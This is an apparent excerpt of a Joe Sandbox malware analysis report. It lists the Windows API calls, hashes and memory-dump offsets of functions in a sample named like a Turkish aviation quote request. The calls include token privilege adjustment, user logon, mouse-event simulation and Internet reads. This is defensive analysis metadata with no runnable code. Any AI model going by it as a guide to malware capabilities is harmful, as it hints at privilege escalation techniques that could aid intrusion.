                                                                                                                                    • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 599397726-0
                                                                                                                                    • Opcode ID: dec32d97d36a0705ffe9f0d9312139c3715db4cd9a827f82ca20bfd648e052a6
                                                                                                                                    • Instruction ID: 40fcfb9d35cb994f4fadb2efd0f30e87e7003c9f165f655af39c649db3ae41bc
                                                                                                                                    • Opcode Fuzzy Hash: dec32d97d36a0705ffe9f0d9312139c3715db4cd9a827f82ca20bfd648e052a6
                                                                                                                                    • Instruction Fuzzy Hash: FC41F57190420ABFEB20DE99DC81FBFB7FCEB40314F20806EF681A6145DB799E419660
                                                                                                                                    APIs
                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0100B343
                                                                                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0100B39D
                                                                                                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0100B3EA
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorMode$DiskFreeSpace
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1682464887-0
                                                                                                                                    • Opcode ID: c1d963658a03babd0889a57eb05c98ffc2c1654090f100d8e7d8ab5d5f59e3e4
                                                                                                                                    • Instruction ID: 93a38b8675a0c632efaa003dcd20690f2e92d263f3bc1f95a44e2608236fb40b
                                                                                                                                    • Opcode Fuzzy Hash: c1d963658a03babd0889a57eb05c98ffc2c1654090f100d8e7d8ab5d5f59e3e4
                                                                                                                                    • Instruction Fuzzy Hash: 98217175A00108EFDB00EFA5D881AEEBBB8FF49314F1480A9E945AB355CB359915DB50
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00FC0DB6: std::exception::exception.LIBCMT ref: 00FC0DEC
                                                                                                                                      • Part of subcall function 00FC0DB6: __CxxThrowException@8.LIBCMT ref: 00FC0E01
                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00FF882B
                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00FF8858
                                                                                                                                    • GetLastError.KERNEL32 ref: 00FF8865
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1922334811-0
                                                                                                                                    • Opcode ID: 736d6d857794411dde3d50156ad5b1c8bd268fc5d041b2fc689e3202f232d925
                                                                                                                                    • Instruction ID: cc4541fdd1177566859c255f19867f3249497925668762d8ec97a995f23bc5d7
                                                                                                                                    • Opcode Fuzzy Hash: 736d6d857794411dde3d50156ad5b1c8bd268fc5d041b2fc689e3202f232d925
                                                                                                                                    • Instruction Fuzzy Hash: 2E1190B2814205AFD728DF54DC86D2BB7BCEF04750B20852EF45687201DE34AC41CB60
                                                                                                                                    APIs
                                                                                                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00FF8774
                                                                                                                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00FF878B
                                                                                                                                    • FreeSid.ADVAPI32(?), ref: 00FF879B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3429775523-0
                                                                                                                                    • Opcode ID: 93623aaf9ce7e72fd68d521471ab13f71f6ca9bcf3e92edcba05ab7fdc68af1d
                                                                                                                                    • Instruction ID: 196c4cf03c57e68e66ffb3bed332c9bade4faf162af1df3ee70e19a749936297
                                                                                                                                    • Opcode Fuzzy Hash: 93623aaf9ce7e72fd68d521471ab13f71f6ca9bcf3e92edcba05ab7fdc68af1d
                                                                                                                                    • Instruction Fuzzy Hash: 20F03775A1120DBBDB10DEE49989AAEBBBCEF08211F5044A9EA01E2180E6796A048B50
                                                                                                                                    APIs
                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0100C6FB
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0100C72B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Find$CloseFileFirst
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2295610775-0
                                                                                                                                    • Opcode ID: 1ecebf07e25952ff0210c3a5995965dd56c3dc9234a3b2f19809b9055168304e
                                                                                                                                    • Instruction ID: f9e2606664d6d792c24e02576c9b45fdc2800d22adeb4888a29862fe1fd269f7
                                                                                                                                    • Opcode Fuzzy Hash: 1ecebf07e25952ff0210c3a5995965dd56c3dc9234a3b2f19809b9055168304e
                                                                                                                                    • Instruction Fuzzy Hash: 0C11A1726046049FDB10DF29CC45A2AF7E8FF85324F44865DF9A9D7291DB78A805CB81
                                                                                                                                    APIs
                                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,01019468,?,0102FB84,?), ref: 0100A097
                                                                                                                                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,01019468,?,0102FB84,?), ref: 0100A0A9
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorFormatLastMessage
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3479602957-0
                                                                                                                                    • Opcode ID: e80a9bbb24e6a3536a99c01e3ac527bce5c990a0002f2a52cc0588bd5a55bcae
                                                                                                                                    • Instruction ID: 6cde32cfb1a9291c93bda04c682974366a99fcd48ea5ab13b54ee84b144b69b1
                                                                                                                                    • Opcode Fuzzy Hash: e80a9bbb24e6a3536a99c01e3ac527bce5c990a0002f2a52cc0588bd5a55bcae
                                                                                                                                    • Instruction Fuzzy Hash: 67F0823520532DBBDB21AEA4CC48FEA776DBF097A1F008156F949D7181D6349544CBA1
                                                                                                                                    APIs
                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00FF8309), ref: 00FF81E0
                                                                                                                                    • CloseHandle.KERNEL32(?,?,00FF8309), ref: 00FF81F2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 81990902-0
                                                                                                                                    • Opcode ID: 85682b4432fd441f9755f8efdfc1d95f3fa19a590659c54828a4a3d5d35965a9
                                                                                                                                    • Instruction ID: 8650d691053d870b973c160b6a5e020fb3e2f85bb3c3de6c7a7fc6e2a4e04428
                                                                                                                                    • Opcode Fuzzy Hash: 85682b4432fd441f9755f8efdfc1d95f3fa19a590659c54828a4a3d5d35965a9
                                                                                                                                    • Instruction Fuzzy Hash: 7EE0BF71010512EEE7352B60EC05E7777A9EF04350B24895DF595C4474DB666C91EB10
                                                                                                                                    APIs
                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00FC8D57,?,?,?,00000001), ref: 00FCA15A
                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00FCA163
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                    • Opcode ID: 4e0069bf2a1b912cf1254b590949bc1e08707a0516f48d1eff50ca7f136cf740
                                                                                                                                    • Instruction ID: c7db986df3a87042823c09eaa46304b7afd2c0f8abbf447ecc89791cb938edfe
                                                                                                                                    • Opcode Fuzzy Hash: 4e0069bf2a1b912cf1254b590949bc1e08707a0516f48d1eff50ca7f136cf740
                                                                                                                                    • Instruction Fuzzy Hash: C2B0923105420AEBCA202F91E809B883F78EB44AE2F508010F64D84054CBE754508B91
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 70905c5e5a89c6d3f9af74e27eb05e0588551df8c97e79df563039d1c0447e9d
                                                                                                                                    • Instruction ID: 4fea84e222a24523393ba61589c6392c58e9fccf3702f440e28380b6dba1438f
                                                                                                                                    • Opcode Fuzzy Hash: 70905c5e5a89c6d3f9af74e27eb05e0588551df8c97e79df563039d1c0447e9d
                                                                                                                                    • Instruction Fuzzy Hash: C0322272D29F024DD7279534C932335A25DAFB73D4F14C73BE85AB59AAEB29C4835200
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 5c333baba1fb4003f05d4d6f3043bc49599edcc30d0a9ef70632a99425d1418a
                                                                                                                                    • Instruction ID: 25b7becff4665a5e0b194fa5c32d95634a3e2ca783edef8b4866fdb2d62a19ef
                                                                                                                                    • Opcode Fuzzy Hash: 5c333baba1fb4003f05d4d6f3043bc49599edcc30d0a9ef70632a99425d1418a
                                                                                                                                    • Instruction Fuzzy Hash: 28B10131E2AF408DD72396398831336B65CAFBB2C5F51D71BFCA6B1D16EB2685835240
                                                                                                                                    APIs
                                                                                                                                    • __time64.LIBCMT ref: 0100889B
                                                                                                                                      • Part of subcall function 00FC520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,01008F6E,00000000,?,?,?,?,0100911F,00000000,?), ref: 00FC5213
                                                                                                                                      • Part of subcall function 00FC520A: __aulldiv.LIBCMT ref: 00FC5233
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Time$FileSystem__aulldiv__time64
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2893107130-0
                                                                                                                                    • Opcode ID: 53a201c8cda173a25c8cae77ecf3f1841c47eaf01457b24d19925e1a5eae8920
                                                                                                                                    • Instruction ID: a744b049d1607cf10e70962d9c40b28320195866b0663cb0716f277ceaaf285f
                                                                                                                                    • Opcode Fuzzy Hash: 53a201c8cda173a25c8cae77ecf3f1841c47eaf01457b24d19925e1a5eae8920
                                                                                                                                    • Instruction Fuzzy Hash: 9B21AF32A256108BD72ACF29D441A52B3E1EBA5311F288E6DD1F5CB2C0CA35B905CB94
                                                                                                                                    APIs
                                                                                                                                    • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 01004C4A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: mouse_event
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2434400541-0
                                                                                                                                    • Opcode ID: 5467691819165dd9073ab16613d8c14553fc5e259d9b171ca03f362f6370079b
                                                                                                                                    • Instruction ID: 8fa64b974c4e784b7a08462fc5a32d4556001ef10bcec07d370e257321aa5607
                                                                                                                                    • Opcode Fuzzy Hash: 5467691819165dd9073ab16613d8c14553fc5e259d9b171ca03f362f6370079b
                                                                                                                                    • Instruction Fuzzy Hash: 57D05EA516461E78FCEE0B249A2FF7A15C8E3806C2FC081C973C1CA0C1ECC458404138
                                                                                                                                    APIs
                                                                                                                                    • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00FF8389), ref: 00FF87D1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LogonUser
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1244722697-0
                                                                                                                                    • Opcode ID: 17f7bf759fd015af7081b6465bd93b5611ea961b8ac97a9807667aada95ffe95
                                                                                                                                    • Instruction ID: c45ea7ede5db869f9ad6826db7eebdd21c6579e56be73f10a9c1ee6bd5ee0580
                                                                                                                                    • Opcode Fuzzy Hash: 17f7bf759fd015af7081b6465bd93b5611ea961b8ac97a9807667aada95ffe95
                                                                                                                                    • Instruction Fuzzy Hash: 6DD05E3226050EABEF118EA4DD01EAE3B69EB04B01F808111FE15D5090C77AD835AF60
                                                                                                                                    APIs
                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00FCA12A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                    • Opcode ID: c9e743fecbfe8cd06a60452b098aa1ed48e5c689674fde609cb375137e77a48f
                                                                                                                                    • Instruction ID: df8d1cde32827d8a0a777400c8f38732c52cfdf39c54ae69bd9c18336cb79aed
                                                                                                                                    • Opcode Fuzzy Hash: c9e743fecbfe8cd06a60452b098aa1ed48e5c689674fde609cb375137e77a48f
                                                                                                                                    • Instruction Fuzzy Hash: 72A0113000020EEB8A202E82E808888BFACEA002E0B008020F80C800228BB3A8208A80
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: df4fd4e3cc4f5131de0e482b52fe08fc65a07666966f9d7d3ece7408127e4d25
                                                                                                                                    • Instruction ID: 002a779c53e30318d232a434021657b496e268aa2cddefc306a81a40c710389d
                                                                                                                                    • Opcode Fuzzy Hash: df4fd4e3cc4f5131de0e482b52fe08fc65a07666966f9d7d3ece7408127e4d25
                                                                                                                                    • Instruction Fuzzy Hash: 55224831D0414ADBDF388A16C4943BD77A9FF817A4F24406AD642CB5A2DB74AC82FF41
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                                    • Instruction ID: 1c5189bf15134f41a52023c7b8e432b0353f148dc6f395ec35a4907960b732f9
                                                                                                                                    • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                                    • Instruction Fuzzy Hash: 55C1DA326050930AEF5D46398636A3EFBA1AEA37B131A075DD4B3CB1C5EE10C979E650
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
